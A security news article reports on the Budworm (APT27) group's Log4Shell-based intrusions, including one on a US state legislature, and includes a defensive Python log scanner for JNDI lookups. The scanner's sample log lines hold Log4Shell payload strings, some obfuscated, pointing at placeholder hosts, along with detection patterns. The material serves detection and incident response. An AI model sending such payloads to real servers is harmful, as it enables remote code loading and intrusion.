An advanced persistent threat (APT) actor known as Budworm targeted a US-based entity for the first time in more than six years, according to the latest research.
The attack targeted an unnamed US state legislature, the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News.
Other “strategically significant” intrusions mounted in the past six months have been against the government of a Middle Eastern country, a multinational electronics manufacturer and a hospital in Southeast Asia.
Budworm, also known as APT27, Bronze Union, Emissary Panda, Lucky Mouse, and Red Phoenix, is a threat actor that is believed to operate on behalf of China through attacks that leverage a mix of custom and freely available tools to exfiltrate information of interest.
“Bronze Union maintains a high degree of operational flexibility in order to adapt to the environments in which it operates,” Secureworks notes in a profile of the nation-state group, highlighting its ability to “maintain access to sensitive systems over a long period of time.”
A prominent backdoor attributed to the adversarial collective is HyperBro, which has been in use since at least 2013 and is in continuous development. Its other tools include PlugX, SysUpdate, and the China Chopper web shell.
The latest round of attacks is no different, with the threat actor exploiting the Log4Shell vulnerability in Apache Log4j to compromise servers and install web shells, ultimately paving the way for the deployment of HyperBro, PlugX, Cobalt Strike, and credential-dumping software.
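Because Log4Shell is the initial-access step described above, the check a defender most wants is a sweep of web server access logs for JNDI lookup payloads, including the URL-encoded and nested-lookup forms attackers use to dodge naive string matches. The example below is added here for illustration and is not code from the Symantec report or from Budworm's tooling; the log lines are constructed, the IP addresses are documentation ranges, and the set of obfuscations it unwraps (`${lower:}`/`${upper:}` and `${...:-x}` defaults, plus one or two layers of URL encoding) covers the common variants, not every possible one.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the report). Lines 1-3 carry
# Log4Shell (CVE-2021-44228) JNDI lookup payloads in different encodings; the
# last two are benign, including a harmless ${date} lookup that must not alert.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.6 - - [13/Dec/2021:10:01:09 +0000] "GET /api?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.9%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.7 - - [13/Dec/2021:10:02:17 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.9/probe}"
10.0.0.8 - - [13/Dec/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Dec/2021:10:03:30 +0000] "GET /search?q=%24%7Bdate%7D HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# ${lower:j} / ${upper:J} -> j  (case-conversion lookups used to hide "jndi")
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}", re.I)
# ${::-j} / ${env:NOPE:-j} -> j  (default-value syntax with an empty/unknown key)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^}$]*)\}")
# The thing we actually care about once obfuscation is peeled away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)", re.I)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and common Log4j lookup nesting so '${jndi:' is visible.

    Repeats until the string stops changing (bounded, so a pathological line
    cannot make this loop forever).
    """
    text = unquote(unquote(text))  # handle single- and double-encoded payloads
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(r"\1", text)
        new = _DEFAULT_LOOKUP.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def find_log4shell(log_text: str) -> list[dict]:
    """Return one record per log line that contains a JNDI lookup after normalization."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if not m:
            continue
        end = norm.find("}", m.end())
        payload = norm[m.start(): end + 1 if end != -1 else len(norm)]
        hits.append({
            "line": lineno,
            "src": line.split()[0],          # client IP, first field of the log line
            "scheme": m.group(1).lower(),    # ldap, rmi, dns, ... tells you the callback type
            "payload": payload,              # normalized lookup string for the analyst
        })
    return hits


if __name__ == "__main__":
    for hit in find_log4shell(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['src']} -> {hit['scheme']} {hit['payload']}")
```

A `dns://` hit usually means a blind probe (the attacker only learns the host is vulnerable), while `ldap://` or `rmi://` with a host and port is an attempt to pull a class or serialized object from the attacker's server; the web shell and follow-on tooling the report describes come after a successful one of those, so the `payload` field is what you hand to the responder. On real logs, run the same normalization over request bodies and other headers Log4j might log, not just the user agent and URI shown here.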
The development marks the second time Budworm has been linked to an attack on a US entity. Earlier this month, the US government disclosed that several nation-state hacking groups breached a defense industrial base organization by exploiting the ProxyLogon flaws in Microsoft Exchange Server to deploy the China Chopper web shell and HyperBro.
“In recent years, the group’s activity appears to have largely focused on Asia, the Middle East and Europe,” the researchers said. “A resumption of attacks against US-based targets could signal a change in direction for the group.”